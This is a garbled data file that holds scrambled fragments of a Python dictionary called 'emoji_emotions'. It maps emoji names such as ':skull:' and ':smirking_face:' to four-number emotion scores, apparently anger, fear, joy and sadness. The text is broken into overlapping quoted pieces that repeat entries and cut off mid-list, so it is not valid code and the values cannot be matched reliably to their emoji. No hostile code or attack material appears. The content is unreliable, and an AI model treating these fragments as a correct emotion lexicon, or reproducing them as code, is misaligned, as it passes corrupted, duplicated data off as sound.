\":cat_face_with_wry_smile:\": [0.25, 0.083, 0.078, 0.121], \":tomato:\": [0.284,", "[0.157, 0.125, 0.063, 0.086], \":fast_up_button:\": [0.243, 0.23600000000000002, 0.251, 0.256], \":white_medium_star:\": [0.237, 0.175, 0.29,", "\":smirking_face:\": [0.258, 0.040999999999999995, 0.096, 0.146], \":face_screaming_in_fear:\": [0.292, 0.263, 0.133, 0.21], \":person_gesturing_NO:\": [0.28800000000000003, 0.28800000000000003,", "\":bride_with_veil:\": [0.193, 0.268, 0.502, 0.185], \":skull:\": [0.36200000000000004, 0.267, 0.055999999999999994, 0.218], \":pill:\": [0.195, 0.253,", "\":musical_note:\": [0.26, 0.191, 0.341, 0.32799999999999996], \":monkey:\": [0.179, 0.379, 0.083, 0.032], \":mouse_face:\": [0.18899999999999997, 0.20800000000000002,", "0.259, 0.38299999999999995, 0.215], \":graduation_cap:\": [0.162, 0.10300000000000001, 0.392, 0.126], \":inbox_tray:\": [0.205, 0.126, 0.14, 0.213],", "0.095, 0.127, 0.239], \":syringe:\": [0.21, 0.245, 0.142, 0.124], \":dotted_six-pointed_star:\": [0.249, 0.161, 0.34299999999999997, 0.282],", "0.152], \":boar:\": [0.187, 0.26899999999999996, 0.122, 0.158], \":boy:\": [0.171, 0.155, 0.225, 0.159], \":open_book:\": [0.196,", "0.057999999999999996], \":battery:\": [0.08199999999999999, 0.179, 0.196, 0.111], \":face_with_steam_from_nose:\": [0.39899999999999997, 0.21, 0.043, 0.22], \":white_medium_square:\": [0.395,", "[0.20600000000000002, 0.095, 0.28, 0.16], \":ten_o’clock:\": [0.141, 0.304, 0.191, 0.309], \":red_triangle_pointed_up:\": [0.321, 0.243, 0.25,", "0.19899999999999998, 0.28600000000000003, 0.201], \":carp_streamer:\": [0.125, 0.212, 0.131, 0.095], \":smiling_face_with_smiling_eyes:\": [0.067, 0.073, 0.248, 0.247],", "\":face_blowing_a_kiss:\": [0.233, 0.022000000000000002, 0.215, 0.14400000000000002], \":information:\": [0.17800000000000002, 0.259, 0.264, 0.284], \":flower_playing_cards:\": [0.18100000000000002, 0.21100000000000002,", "\":wind_chime:\": [0.214, 0.17600000000000002, 0.271, 0.166], \":open_hands:\": [0.203, 0.18899999999999997, 0.16699999999999998, 0.23], \":flexed_biceps:\": [0.225, 0.251,", "0.321, 0.121], \":frog_face:\": [0.408, 0.29100000000000004, 0.19699999999999998, 0.16699999999999998], \":flashlight:\": [0.07400000000000001, 0.19699999999999998, 0.14300000000000002, 0.131], \":downcast_face_with_sweat:\":", "[0.113, 0.196, 0.111, 0.204], \":monkey_face:\": [0.19399999999999998, 0.327, 0.079, 0.061], \":bookmark:\": [0.257, 0.174, 0.182,", "0.161, 0.182], \":kitchen_knife:\": [0.321, 0.449, 0.075, 0.125], \":straight_ruler:\": [0.249, 0.20600000000000002, 0.215, 0.155], \":squinting_face_with_tongue:\":", "\":pager:\": [0.14400000000000002, 0.191, 0.22899999999999998, 0.259], \":anxious_face_with_sweat:\": [0.34299999999999997, 0.439, 0.134, 0.35200000000000004], \":tropical_drink:\": [0.14400000000000002, 0.17800000000000002,", "0.087, 0.19699999999999998], \":file_folder:\": [0.151, 0.217, 0.158, 0.205], \":megaphone:\": [0.239, 0.214, 0.16699999999999998, 0.22], \":bug:\":", "0.149, 0.322], \":ant:\": [0.26899999999999996, 0.308, 0.098, 0.11199999999999999], \":envelope_with_arrow:\": [0.251, 0.08800000000000001, 0.063, 0.19899999999999998], \":crying_cat_face:\":", "0.341, 0.32799999999999996], \":monkey:\": [0.179, 0.379, 0.083, 0.032], \":mouse_face:\": [0.18899999999999997, 0.20800000000000002, 0.136, 0.094], \":person_getting_massage:\":", "0.214, 0.14300000000000002], \":castle:\": [0.069, 0.20199999999999999, 0.132, 0.222], \":bookmark_tabs:\": [0.13699999999999998, 0.228, 0.301, 0.23], \":face_savoring_food:\":", "0.242], \":clinking_beer_mugs:\": [0.096, 0.10099999999999999, 0.179, 0.132], \":smiling_face_with_sunglasses:\": [0.036000000000000004, 0.092, 0.026000000000000002, 0.09300000000000001], \":white_small_square:\": [0.276,", "\":moon_viewing_ceremony:\": [0.149, 0.14300000000000002, 0.43700000000000006, 0.231], \":tropical_fish:\": [0.063, 0.271, 0.14, 0.122], \":paw_prints:\": [0.266, 0.249,", "[0.13699999999999998, 0.228, 0.301, 0.23], \":face_savoring_food:\": [0.128, 0.107, 0.16899999999999998, 0.091], \":woman’s_sandal:\": [0.24600000000000002, 0.23600000000000002, 0.20800000000000002,", "0.055, 0.081, 0.193], \":up-left_arrow:\": [0.193, 0.214, 0.18600000000000003, 0.124], \":joker:\": [0.233, 0.28600000000000003, 0.051, 0.177],", "0.139], \":worried_face:\": [0.349, 0.397, 0.09699999999999999, 0.348], \":foggy:\": [0.162, 0.301, 0.317, 0.28300000000000003], \":turtle:\": [0.10800000000000001,", "0.254, 0.092, 0.262], \":memo:\": [0.147, 0.235, 0.26899999999999996, 0.203], \":face_with_open_mouth:\": [0.271, 0.29, 0.16, 0.295],", "\":backhand_index_pointing_right:\": [0.19699999999999998, 0.258, 0.249, 0.258], \":handbag:\": [0.099, 0.154, 0.223, 0.293], \":Libra:\": [0.14400000000000002, 0.193,", "\":trumpet:\": [0.128, 0.17800000000000002, 0.20600000000000002, 0.221], \":mouth:\": [0.245, 0.136, 0.321, 0.121], \":frog_face:\": [0.408, 0.29100000000000004,", "\":paperclip:\": [0.289, 0.21899999999999997, 0.19399999999999998, 0.231], \":outbox_tray:\": [0.204, 0.22899999999999998, 0.19699999999999998, 0.19399999999999998], \":woman’s_boot:\": [0.221, 0.095,", "0.28800000000000003, 0.11, 0.29600000000000004], \":fountain:\": [0.10099999999999999, 0.22899999999999998, 0.276, 0.292], \":seat:\": [0.155, 0.24, 0.067, 0.13699999999999998],", "[0.26899999999999996, 0.308, 0.098, 0.11199999999999999], \":envelope_with_arrow:\": [0.251, 0.08800000000000001, 0.063, 0.19899999999999998], \":crying_cat_face:\": [0.257, 0.264, 0.24600000000000002,", "[0.179, 0.379, 0.083, 0.032], \":mouse_face:\": [0.18899999999999997, 0.20800000000000002, 0.136, 0.094], \":person_getting_massage:\": [0.264, 0.23199999999999998, 0.258,", "0.22899999999999998, 0.276, 0.292], \":seat:\": [0.155, 0.24, 0.067, 0.13699999999999998], \":reverse_button:\": [0.256, 0.262, 0.114, 0.29600000000000004],", "[0.292, 0.263, 0.133, 0.21], \":person_gesturing_NO:\": [0.28800000000000003, 0.28800000000000003, 0.11, 0.29600000000000004], \":fountain:\": [0.10099999999999999, 0.22899999999999998, 0.276,", "[0.165, 0.21600000000000003, 0.11900000000000001, 0.188], \":white_circle:\": [0.22, 0.16399999999999998, 0.121, 0.217], \":old_woman:\": [0.235, 0.299, 0.326,", "0.221, 0.24], \":ATM_sign:\": [0.128, 0.179, 0.135, 0.171], \":radio_button:\": [0.218, 0.209, 0.158, 0.261], \":clipboard:\":", "\":dress:\": [0.183, 0.16, 0.292, 0.242], \":blond-haired_person:\": [0.257, 0.23, 0.226, 0.166], \":love_letter:\": [0.13, 0.15,", "[0.251, 0.27, 0.095, 0.242], \":clinking_beer_mugs:\": [0.096, 0.10099999999999999, 0.179, 0.132], \":smiling_face_with_sunglasses:\": [0.036000000000000004, 0.092, 0.026000000000000002,", "0.09, 0.059000000000000004, 0.204], \":no_entry:\": [0.312, 0.445, 0.136, 0.344], \":water_wave:\": [0.106, 0.29, 0.12300000000000001, 0.222],", "[0.37, 0.423, 0.128, 0.355], \":alarm_clock:\": [0.17600000000000002, 0.28, 0.154, 0.22699999999999998], \":wine_glass:\": [0.046, 0.124, 0.218,", "0.16899999999999998, 0.12, 0.292], \":dog_face:\": [0.13, 0.18, 0.257, 0.084], \":no_one_under_eighteen:\": [0.109, 0.136, 0.051, 0.179],", "\":floppy_disk:\": [0.168, 0.324, 0.341, 0.308], \":orange_book:\": [0.18100000000000002, 0.193, 0.18600000000000003, 0.217], \":Japanese_castle:\": [0.092, 0.23199999999999998,", "\":ATM_sign:\": [0.128, 0.179, 0.135, 0.171], \":radio_button:\": [0.218, 0.209, 0.158, 0.261], \":clipboard:\": [0.157, 0.233,", "0.264, 0.19399999999999998], \":woman:\": [0.24100000000000002, 0.215, 0.29, 0.142], \":two_hearts:\": [0.172, 0.08800000000000001, 0.38299999999999995, 0.142], \":dollar_banknote:\":", "0.172], \":laptop_computer:\": [0.127, 0.23399999999999999, 0.35, 0.255], \":mushroom:\": [0.188, 0.239, 0.21, 0.084], \":grinning_face_with_big_eyes:\": [0.19399999999999998,", "0.159, 0.272], \":glowing_star:\": [0.191, 0.215, 0.38, 0.134], \":person_swimming:\": [0.175, 0.159, 0.086, 0.245], \":ogre:\":", "0.20800000000000002, 0.153], \":hatching_chick:\": [0.099, 0.171, 0.16, 0.125], \":heavy_dollar_sign:\": [0.203, 0.149, 0.113, 0.228], \":Taurus:\":", "0.187, 0.154, 0.348], \":small_blue_diamond:\": [0.23, 0.18100000000000002, 0.24600000000000002, 0.23199999999999998], \":grinning_cat_face_with_smiling_eyes:\": [0.12, 0.161, 0.17600000000000002, 0.201],", "[0.12, 0.195, 0.08800000000000001, 0.222], \":locked:\": [0.146, 0.141, 0.196, 0.212], \":hammer:\": [0.33299999999999996, 0.42700000000000005, 0.221,", "\":cookie:\": [0.11699999999999999, 0.18, 0.168, 0.1], \":running_shirt:\": [0.138, 0.081, 0.20199999999999999, 0.203], \":heart_decoration:\": [0.13699999999999998, 0.046,", "0.17600000000000002, 0.233, 0.239], \":soccer_ball:\": [0.147, 0.332, 0.115, 0.41100000000000003], \":Santa_Claus:\": [0.131, 0.226, 0.254, 0.166],", "0.12300000000000001, 0.222], \":horse:\": [0.281, 0.172, 0.14800000000000002, 0.212], \":ewe:\": [0.29, 0.16899999999999998, 0.12, 0.292], \":dog_face:\":", "[0.254, 0.267, 0.276, 0.235], \":TOP_arrow:\": [0.162, 0.185, 0.205, 0.191], \":fearful_face:\": [0.344, 0.389, 0.08800000000000001,", "\":Leo:\": [0.24100000000000002, 0.221, 0.212, 0.24100000000000002], \":Japanese_congratulations_button:\": [0.158, 0.162, 0.255, 0.19899999999999998], \":waxing_gibbous_moon:\": [0.18100000000000002, 0.245,", "0.19899999999999998, 0.18], \":man_with_Chinese_cap:\": [0.255, 0.262, 0.126, 0.17600000000000002], \":kiss:\": [0.188, 0.122, 0.358, 0.22699999999999998], \":closed_umbrella:\":", "0.316], \":bridge_at_night:\": [0.079, 0.151, 0.24, 0.247], \":briefcase:\": [0.17300000000000001, 0.192, 0.28600000000000003, 0.175], \":musical_notes:\": [0.149,", "[0.287, 0.247, 0.22, 0.22399999999999998], \":grapes:\": [0.17600000000000002, 0.155, 0.179, 0.17600000000000002], \":koala:\": [0.11900000000000001, 0.217, 0.11599999999999999,", "[0.136, 0.16, 0.159, 0.212], \":woman’s_clothes:\": [0.20800000000000002, 0.154, 0.179, 0.242], \":goblin:\": [0.42, 0.35, 0.149,", "\":person_surfing:\": [0.12, 0.195, 0.08800000000000001, 0.222], \":locked:\": [0.146, 0.141, 0.196, 0.212], \":hammer:\": [0.33299999999999996, 0.42700000000000005,", "0.168, 0.152], \":dress:\": [0.183, 0.16, 0.292, 0.242], \":blond-haired_person:\": [0.257, 0.23, 0.226, 0.166], \":love_letter:\":", "[0.122, 0.35, 0.191, 0.298], \":Pisces:\": [0.16899999999999998, 0.17600000000000002, 0.233, 0.239], \":soccer_ball:\": [0.147, 0.332, 0.115,", "0.131, 0.29100000000000004, 0.098], \":ghost:\": [0.147, 0.201, 0.017, 0.10800000000000001], \":telephone_receiver:\": [0.179, 0.16699999999999998, 0.10099999999999999, 0.311],", "0.131], \":part_alternation_mark:\": [0.203, 0.12300000000000001, 0.201, 0.305], \":magnifying_glass_tilted_right:\": [0.177, 0.253, 0.244, 0.12300000000000001], \":red_circle:\": [0.244,", "0.078, 0.121], \":tomato:\": [0.284, 0.22, 0.294, 0.23600000000000002], \":blue_book:\": [0.156, 0.191, 0.149, 0.193], \":headphone:\":", "0.095, 0.28, 0.16], \":ten_o’clock:\": [0.141, 0.304, 0.191, 0.309], \":red_triangle_pointed_up:\": [0.321, 0.243, 0.25, 0.214],", "0.253, 0.182, 0.203], \":package:\": [0.126, 0.18600000000000003, 0.214, 0.14300000000000002], \":castle:\": [0.069, 0.20199999999999999, 0.132, 0.222],", "0.316, 0.35700000000000004], \":dvd:\": [0.184, 0.14300000000000002, 0.319, 0.307], \":up-right_arrow:\": [0.19899999999999998, 0.22399999999999998, 0.159, 0.243], \":right_arrow_curving_up:\":", "0.37, 0.188], \":snake:\": [0.37, 0.35200000000000004, 0.16899999999999998, 0.166], \":floppy_disk:\": [0.168, 0.324, 0.341, 0.308], \":orange_book:\":", "0.23800000000000002, 0.295], \":yellow_heart:\": [0.158, 0.177, 0.27, 0.262], \":Gemini:\": [0.228, 0.132, 0.262, 0.177], \":hibiscus:\":", "0.17, 0.233, 0.228], \":elephant:\": [0.22399999999999998, 0.23399999999999999, 0.163, 0.156], \":yen_banknote:\": [0.217, 0.182, 0.171, 0.302],", "\":antenna_bars:\": [0.16399999999999998, 0.122, 0.151, 0.132], \":pouting_cat_face:\": [0.45399999999999996, 0.268, 0.11900000000000001, 0.295], \":index_pointing_up:\": [0.254, 0.233,", "[0.26899999999999996, 0.25, 0.147, 0.201], \":sheaf_of_rice:\": [0.188, 0.259, 0.38299999999999995, 0.215], \":graduation_cap:\": [0.162, 0.10300000000000001, 0.392,", "0.067, 0.13699999999999998], \":reverse_button:\": [0.256, 0.262, 0.114, 0.29600000000000004], \":heart_suit:\": [0.165, 0.12300000000000001, 0.336, 0.193], \":trident_emblem:\":", "0.11599999999999999, 0.226], \":purse:\": [0.105, 0.196, 0.302, 0.20199999999999999], \":old_man:\": [0.27, 0.263, 0.276, 0.215], \":calendar:\":", "0.14300000000000002, 0.177], \":ledger:\": [0.115, 0.17, 0.256, 0.182], \":shooting_star:\": [0.17600000000000002, 0.16, 0.377, 0.2], \":seedling:\":", "0.138], \":guard:\": [0.19, 0.23, 0.081, 0.17600000000000002], \":love_hotel:\": [0.040999999999999995, 0.141, 0.22899999999999998, 0.155], \":alien_monster:\": [0.128,", "[0.091, 0.251, 0.12300000000000001, 0.079], \":new_moon:\": [0.239, 0.221, 0.258, 0.29100000000000004], \":man’s_shoe:\": [0.276, 0.174, 0.11,", "\":violin:\": [0.17600000000000002, 0.139, 0.298, 0.22399999999999998], \":beating_heart:\": [0.171, 0.078, 0.32299999999999995, 0.157], \":grinning_face:\": [0.163, 0.17300000000000001,", "\":ten_o’clock:\": [0.141, 0.304, 0.191, 0.309], \":red_triangle_pointed_up:\": [0.321, 0.243, 0.25, 0.214], \":grinning_face_with_sweat:\": [0.19, 0.307,", "0.185], \":ear_of_corn:\": [0.141, 0.156, 0.182, 0.16699999999999998], \":pot_of_food:\": [0.18, 0.149, 0.177, 0.193], \":two_o’clock:\": [0.122,", "0.141, 0.156], \":e-mail:\": [0.26, 0.225, 0.21, 0.24], \":black_medium-small_square:\": [0.392, 0.21100000000000002, 0.18600000000000003, 0.255], \":backhand_index_pointing_up:\":", "0.051, 0.179], \":left-right_arrow:\": [0.32899999999999996, 0.37200000000000005, 0.214, 0.335], \":smiling_cat_face_with_heart-eyes:\": [0.304, 0.1, 0.319, 0.145], \":clapper_board:\":", "0.282, 0.145], \":game_die:\": [0.126, 0.162, 0.09, 0.179], \":person_pouting:\": [0.293, 0.244, 0.196, 0.299], \":sunrise_over_mountains:\":", "\":candy:\": [0.192, 0.184, 0.188, 0.12], \":Leo:\": [0.24100000000000002, 0.221, 0.212, 0.24100000000000002], \":Japanese_congratulations_button:\": [0.158, 0.162,", "0.217], \":Japanese_castle:\": [0.092, 0.23199999999999998, 0.16399999999999998, 0.149], \":chestnut:\": [0.212, 0.16699999999999998, 0.16899999999999998, 0.078], \":curry_rice:\": [0.161,", "0.19699999999999998, 0.188, 0.149], \":folded_hands:\": [0.187, 0.17800000000000002, 0.485, 0.35100000000000003], \":musical_note:\": [0.26, 0.191, 0.341, 0.32799999999999996],", "0.27, 0.174, 0.102], \":blowfish:\": [0.21, 0.214, 0.155, 0.138], \":bear_face:\": [0.205, 0.256, 0.129, 0.196],", "0.251, 0.231, 0.204], \":down_arrow:\": [0.33899999999999997, 0.268, 0.142, 0.252], \":snowboarder:\": [0.13699999999999998, 0.132, 0.028999999999999998, 0.20600000000000002],", "0.081, 0.237, 0.29], \":musical_score:\": [0.149, 0.09, 0.371, 0.315], \":white_square_button:\": [0.35100000000000003, 0.226, 0.225, 0.16699999999999998],", "0.345, 0.252], \":balloon:\": [0.042, 0.128, 0.102, 0.077], \":family:\": [0.249, 0.132, 0.418, 0.215], \":exclamation_question_mark:\":", "0.32, 0.249], \":antenna_bars:\": [0.16399999999999998, 0.122, 0.151, 0.132], \":pouting_cat_face:\": [0.45399999999999996, 0.268, 0.11900000000000001, 0.295], \":index_pointing_up:\":", "0.319], \":person_raising_hand:\": [0.068, 0.084, 0.08, 0.156], \":sweat_droplets:\": [0.26, 0.11900000000000001, 0.081, 0.16899999999999998], \":cherries:\": [0.171,", "0.243, 0.25, 0.214], \":grinning_face_with_sweat:\": [0.19, 0.307, 0.23199999999999998, 0.27699999999999997], \":loudly_crying_face:\": [0.24600000000000002, 0.276, 0.198, 0.272],", "0.284, 0.312, 0.20800000000000002], \":jack-o-lantern:\": [0.129, 0.327, 0.09, 0.092], \":wind_chime:\": [0.214, 0.17600000000000002, 0.271, 0.166],", "0.29600000000000004, 0.287, 0.19699999999999998], \":small_orange_diamond:\": [0.258, 0.162, 0.23399999999999999, 0.271], \":map_of_Japan:\": [0.122, 0.213, 0.24100000000000002, 0.152],", "0.12], \":dango:\": [0.27899999999999997, 0.193, 0.139, 0.054000000000000006], \":doughnut:\": [0.152, 0.259, 0.136, 0.15], \":fire:\": [0.306,", "[0.191, 0.21899999999999997, 0.25, 0.121], \":crossed_flags:\": [0.114, 0.048, 0.039, 0.207], \":input_latin_uppercase:\": [0.182, 0.175, 0.161,", "[0.16399999999999998, 0.26899999999999996, 0.14800000000000002, 0.29], \":television:\": [0.322, 0.247, 0.22699999999999998, 0.222], \":face_blowing_a_kiss:\": [0.233, 0.022000000000000002, 0.215,", "0.182], \":kitchen_knife:\": [0.321, 0.449, 0.075, 0.125], \":straight_ruler:\": [0.249, 0.20600000000000002, 0.215, 0.155], \":squinting_face_with_tongue:\": [0.083,", "0.09699999999999999, 0.348], \":foggy:\": [0.162, 0.301, 0.317, 0.28300000000000003], \":turtle:\": [0.10800000000000001, 0.251, 0.239, 0.08], \":Tokyo_tower:\":", "0.258, 0.182, 0.225], \":twelve_o’clock:\": [0.18600000000000003, 0.34700000000000003, 0.165, 0.349], \":kimono:\": [0.14400000000000002, 0.196, 0.23800000000000002, 0.222],", "0.078, 0.159], \":left_arrow_curving_right:\": [0.138, 0.275, 0.228, 0.22899999999999998], \":palm_tree:\": [0.035, 0.34299999999999997, 0.129, 0.23800000000000002], \":honeybee:\":", "0.196, 0.13699999999999998, 0.214], \":two-hump_camel:\": [0.151, 0.263, 0.131, 0.154], \":white_flower:\": [0.187, 0.141, 0.19, 0.14400000000000002],", "\":Christmas_tree:\": [0.13699999999999998, 0.17, 0.285, 0.081], \":chicken:\": [0.16899999999999998, 0.192, 0.218, 0.127], \":sparkling_heart:\": [0.217, 0.068,", "[0.12300000000000001, 0.077, 0.069, 0.166], \":angry_face_with_horns:\": [0.385, 0.257, 0.03, 0.21100000000000002], \":kissing_face_with_smiling_eyes:\": [0.203, 0.126, 0.256,", "0.249], \":antenna_bars:\": [0.16399999999999998, 0.122, 0.151, 0.132], \":pouting_cat_face:\": [0.45399999999999996, 0.268, 0.11900000000000001, 0.295], \":index_pointing_up:\": [0.254,", "0.179, 0.262], \":grinning_face_with_smiling_eyes:\": [0.184, 0.19699999999999998, 0.188, 0.149], \":folded_hands:\": [0.187, 0.17800000000000002, 0.485, 0.35100000000000003], \":musical_note:\":", "\":smiling_face_with_heart-eyes:\": [0.307, 0.18, 0.308, 0.13699999999999998], \":kissing_face:\": [0.215, 0.171, 0.159, 0.272], \":glowing_star:\": [0.191, 0.215,", "0.273], \":nail_polish:\": [0.418, 0.121, 0.314, 0.099], \":nine_o’clock:\": [0.15, 0.36700000000000005, 0.19699999999999998, 0.331], \":rice_ball:\": [0.10300000000000001,", "[0.217, 0.182, 0.171, 0.302], \":warning:\": [0.264, 0.293, 0.107, 0.212], \":shortcake:\": [0.126, 0.196, 0.166,", "0.142], \":dollar_banknote:\": [0.21, 0.19, 0.149, 0.192], \":camera:\": [0.198, 0.29600000000000004, 0.287, 0.19699999999999998], \":small_orange_diamond:\": [0.258,", "\":locked_with_key:\": [0.20600000000000002, 0.095, 0.28, 0.16], \":ten_o’clock:\": [0.141, 0.304, 0.191, 0.309], \":red_triangle_pointed_up:\": [0.321, 0.243,", "0.113], \":necktie:\": [0.20199999999999999, 0.094, 0.11199999999999999, 0.147], \":card_index:\": [0.147, 0.196, 0.249, 0.212], \":red_triangle_pointed_down:\": [0.304,", "0.33399999999999996, 0.19899999999999998], \":bread:\": [0.142, 0.205, 0.18100000000000002, 0.156], \":hotel:\": [0.075, 0.24600000000000002, 0.196, 0.184], \":lipstick:\":", "0.231, 0.099, 0.326], \":neutral_face:\": [0.415, 0.309, 0.149, 0.322], \":ant:\": [0.26899999999999996, 0.308, 0.098, 0.11199999999999999],", "\":couple_with_heart:\": [0.165, 0.113, 0.409, 0.25], \":relieved_face:\": [0.127, 0.182, 0.254, 0.13699999999999998], \":grimacing_face:\": [0.161, 0.32799999999999996,", "0.099, 0.19699999999999998, 0.11199999999999999], \":down-right_arrow:\": [0.23, 0.242, 0.10300000000000001, 0.175], \":wedding:\": [0.092, 0.139, 0.631, 0.252],", "[0.299, 0.33, 0.316, 0.35700000000000004], \":dvd:\": [0.184, 0.14300000000000002, 0.319, 0.307], \":up-right_arrow:\": [0.19899999999999998, 0.22399999999999998, 0.159,", "0.226, 0.249], \":nose:\": [0.38299999999999995, 0.272, 0.18600000000000003, 0.52], \":closed_book:\": [0.19899999999999998, 0.162, 0.256, 0.16], \":basketball:\":", "0.172, 0.235], \":church:\": [0.20800000000000002, 0.276, 0.773, 0.366], \":cyclone:\": [0.16899999999999998, 0.28800000000000003, 0.177, 0.214], \":black_large_square:\":", "[0.053, 0.14, 0.07, 0.08], \":chart_decreasing:\": [0.28800000000000003, 0.396, 0.294, 0.38299999999999995], \":upwards_button:\": [0.264, 0.261, 0.23800000000000002,", "[0.14400000000000002, 0.17800000000000002, 0.159, 0.11900000000000001], \":baby:\": [0.266, 0.201, 0.457, 0.156], \":wheelchair_symbol:\": [0.18, 0.179, 0.09300000000000001,", "0.233], \":baby_angel:\": [0.20600000000000002, 0.19699999999999998, 0.414, 0.371], \":bar_chart:\": [0.213, 0.255, 0.41, 0.228], \":locked_with_key:\": [0.20600000000000002,", "0.247], \":mount_fuji:\": [0.196, 0.225, 0.253, 0.172], \":play_button:\": [0.168, 0.284, 0.17, 0.17800000000000002], \":high_voltage:\": [0.252,", "0.301, 0.23], \":face_savoring_food:\": [0.128, 0.107, 0.16899999999999998, 0.091], \":woman’s_sandal:\": [0.24600000000000002, 0.23600000000000002, 0.20800000000000002, 0.23], \":man:\":", "0.336, 0.193], \":trident_emblem:\": [0.228, 0.14400000000000002, 0.21899999999999997, 0.257], \":five_o’clock:\": [0.126, 0.335, 0.21, 0.264], \":unamused_face:\":", "\":black_medium_square:\": [0.445, 0.245, 0.21, 0.264], \":Capricorn:\": [0.196, 0.172, 0.3, 0.179], \":pool_8_ball:\": [0.257, 0.09,", "0.24600000000000002], \":night_with_stars:\": [0.09, 0.174, 0.298, 0.289], \":tulip:\": [0.175, 0.245, 0.37, 0.188], \":snake:\": [0.37,", "0.069, 0.166], \":angry_face_with_horns:\": [0.385, 0.257, 0.03, 0.21100000000000002], \":kissing_face_with_smiling_eyes:\": [0.203, 0.126, 0.256, 0.138], \":woman’s_hat:\":", "\":honeybee:\": [0.381, 0.285, 0.128, 0.111], \":rabbit_face:\": [0.165, 0.222, 0.217, 0.037000000000000005], \":pensive_face:\": [0.261, 0.40399999999999997,", "\":black_small_square:\": [0.319, 0.249, 0.141, 0.22699999999999998], \":spade_suit:\": [0.24600000000000002, 0.213, 0.187, 0.27899999999999997], \":performing_arts:\": [0.159, 0.10800000000000001,", "0.13699999999999998], \":hear-no-evil_monkey:\": [0.303, 0.27699999999999997, 0.094, 0.28300000000000003], \":circus_tent:\": [0.113, 0.196, 0.111, 0.204], \":monkey_face:\": [0.19399999999999998,", "0.391, 0.107], \":SOON_arrow:\": [0.12300000000000001, 0.179, 0.191, 0.302], \":cooking:\": [0.078, 0.221, 0.139, 0.11800000000000001], \":slot_machine:\":", "0.23, 0.226, 0.166], \":love_letter:\": [0.13, 0.15, 0.331, 0.142], \":bomb:\": [0.22, 0.196, 0.163, 0.205],", "0.162], \":first_quarter_moon_face:\": [0.11, 0.10300000000000001, 0.32, 0.22699999999999998], \":sake:\": [0.145, 0.255, 0.282, 0.145], \":game_die:\": [0.126,", "0.28, 0.12300000000000001], \":smirking_face:\": [0.258, 0.040999999999999995, 0.096, 0.146], \":face_screaming_in_fear:\": [0.292, 0.263, 0.133, 0.21], \":person_gesturing_NO:\":", "\":smiling_face:\": [0.095, 0.13, 0.245, 0.17600000000000002], \":skis:\": [0.10300000000000001, 0.077, 0.051, 0.192], \":clapping_hands:\": [0.21899999999999997, 0.256,", "\":smiling_cat_face_with_heart-eyes:\": [0.304, 0.1, 0.319, 0.145], \":clapper_board:\": [0.213, 0.196, 0.237, 0.162], \":first_quarter_moon_face:\": [0.11, 0.10300000000000001,", "\":elephant:\": [0.22399999999999998, 0.23399999999999999, 0.163, 0.156], \":yen_banknote:\": [0.217, 0.182, 0.171, 0.302], \":warning:\": [0.264, 0.293,", "0.201, 0.284, 0.168], \":three_o’clock:\": [0.16699999999999998, 0.369, 0.209, 0.282], \":sunflower:\": [0.203, 0.243, 0.354, 0.212],", "fear, joy, sadness emoji_emotions = { \":person_surfing:\": [0.12, 0.195, 0.08800000000000001, 0.222], \":locked:\": [0.146,", "0.153], \":four_o’clock:\": [0.165, 0.361, 0.171, 0.282], \":jeans:\": [0.2, 0.109, 0.134, 0.209], \":blossom:\": [0.20199999999999999,", "\":love_letter:\": [0.13, 0.15, 0.331, 0.142], \":bomb:\": [0.22, 0.196, 0.163, 0.205], \":direct_hit:\": [0.177, 0.213,", "0.218, 0.302, 0.27399999999999997], \":black_circle:\": [0.335, 0.212, 0.17600000000000002, 0.3], \":left_arrow:\": [0.282, 0.221, 0.126, 0.19899999999999998],", "0.249], \":nose:\": [0.38299999999999995, 0.272, 0.18600000000000003, 0.52], \":closed_book:\": [0.19899999999999998, 0.162, 0.256, 0.16], \":basketball:\": [0.171,", "\":grapes:\": [0.17600000000000002, 0.155, 0.179, 0.17600000000000002], \":koala:\": [0.11900000000000001, 0.217, 0.11599999999999999, 0.109], \":paperclip:\": [0.289, 0.21899999999999997,", "0.191, 0.17300000000000001, 0.129], \":cherry_blossom:\": [0.122, 0.19699999999999998, 0.31, 0.13], \":heart_with_ribbon:\": [0.106, 0.172, 0.41700000000000004, 0.14400000000000002],", "0.316], \":crown:\": [0.33299999999999996, 0.11800000000000001, 0.268, 0.127], \":dizzy:\": [0.233, 0.147, 0.359, 0.134], \":six_o’clock:\": [0.14300000000000002,", "[0.11199999999999999, 0.11599999999999999, 0.138, 0.139], \":pager:\": [0.14400000000000002, 0.191, 0.22899999999999998, 0.259], \":anxious_face_with_sweat:\": [0.34299999999999997, 0.439, 0.134,", "0.158], \":artist_palette:\": [0.136, 0.11800000000000001, 0.442, 0.057999999999999996], \":battery:\": [0.08199999999999999, 0.179, 0.196, 0.111], \":face_with_steam_from_nose:\": [0.39899999999999997,", "0.095], \":smiling_face_with_smiling_eyes:\": [0.067, 0.073, 0.248, 0.247], \":mount_fuji:\": [0.196, 0.225, 0.253, 0.172], \":play_button:\": [0.168,", "0.242, 0.42700000000000005], \":seven_o’clock:\": [0.15, 0.35, 0.08900000000000001, 0.33], \":smiling_face_with_horns:\": [0.213, 0.055, 0.081, 0.193], \":up-left_arrow:\":", "0.175, 0.41600000000000004], \":down-left_arrow:\": [0.13699999999999998, 0.171, 0.151, 0.12], \":dango:\": [0.27899999999999997, 0.193, 0.139, 0.054000000000000006], \":doughnut:\":", "0.17800000000000002, 0.122, 0.315], \":cityscape_at_dusk:\": [0.053, 0.24, 0.259, 0.23399999999999999], \":steaming_bowl:\": [0.183, 0.129, 0.16699999999999998, 0.226],", "0.20600000000000002, 0.251], \":four_leaf_clover:\": [0.17, 0.16, 0.324, 0.156], \":wrapped_gift:\": [0.076, 0.188, 0.326, 0.057999999999999996], \":face_without_mouth:\":", "0.129, 0.185], \":tiger_face:\": [0.13, 0.392, 0.07400000000000001, 0.259], \":sunrise:\": [0.107, 0.292, 0.4, 0.158], \":artist_palette:\":", "\":bell:\": [0.27, 0.21899999999999997, 0.242, 0.42700000000000005], \":seven_o’clock:\": [0.15, 0.35, 0.08900000000000001, 0.33], \":smiling_face_with_horns:\": [0.213, 0.055,", "0.121], \":tomato:\": [0.284, 0.22, 0.294, 0.23600000000000002], \":blue_book:\": [0.156, 0.191, 0.149, 0.193], \":headphone:\": [0.16699999999999998,", "0.46, 0.17300000000000001], \":chequered_flag:\": [0.221, 0.184, 0.125, 0.263], \":couple_with_heart:\": [0.165, 0.113, 0.409, 0.25], \":relieved_face:\":", "[0.244, 0.22, 0.11199999999999999, 0.27899999999999997], \":eggplant:\": [0.353, 0.23399999999999999, 0.17800000000000002, 0.165], \":shaved_ice:\": [0.213, 0.168, 0.152,", "[0.415, 